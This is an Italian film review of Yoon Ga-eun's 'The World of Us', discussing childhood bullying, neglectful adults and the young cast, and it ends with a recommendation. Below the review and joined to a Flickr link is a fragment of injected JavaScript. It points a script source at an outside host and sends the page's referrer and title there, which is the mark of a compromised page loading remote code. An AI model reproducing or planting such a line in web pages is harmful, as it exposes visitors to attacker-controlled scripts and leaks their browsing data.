“The world of us” di Yoon Ga-eun

The world of us racconta della piccola Sun, emarginata dalle compagne di scuola e che sembra non riuscire a fare amicizia con nessuno. Questo finché non incontra Jia, una nuova compagna con la quale stringe un legame immediato, profondo e sincero. L’intromissione della terribile Bora farà barcollare la purezza di quest’amicizia contaminandola con bugie e malignità di ogni genere. Come se non bastasse, Sun vive una situazione non idilliaca neppure in famiglia, con un padre alcolizzato e una madre poco presente. Tuttavia l’innocente spirito della protagonista farà sì che nonostante tutte le angherie subite, lei non si perda d’animo e ricerchi sempre quel legame con l’amica del cuore.

Sarebbe troppo semplificativo chiamarlo “dramma adolescenziale”, perché qui vengono sì poste in primo piano le dinamiche del bullismo, ma allo stesso tempo la regista le mischia e reinventa.

Nell’irritazione suscitata dalla crudeltà con cui le ragazzine bullizzano le loro coetanee inconsapevoli dell’entità delle ferite che possono infliggere, non si può non provare anche pena per il loro comportamento: esso in fondo non è che il frutto delle brutalità delle quali anche loro stesse sono vittime, testimoni e imitatrici. Per esse, abituate a vedere questo stesso comportamento negli adulti, lo ripropongono nel loro mondo,  privo però degli strumenti di protezione che si formano con l’età. Gli stessi adulti vengono dipinti come personaggi marginali, che guardano ai problemi dei ragazzini con disattenzione e sufficienza.

Tutto ciò rattrista e fa entrare lo spettatore in empatia con le protagoniste: tutti sono stati degli 11enni in lotta con un mondo che non parla la loro lingua e nel quale cercano di sopravvivere a modo proprio. Pertanto quest’opera, che non include nessun eclatante picco drammatico, si rivela un racconto delicato (grazie al tocco sensibile della giovane regista Yoon Ga-eun) ma efficace nel contenuto e nell’interpretazione delle bravissime ragazzine protagoniste, tutte acerbe ma promettenti. Consigliato.

Francesca B.



 

https://www.flickr.com/photos/fareastfilm/sets/72157667136734225/s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Share This: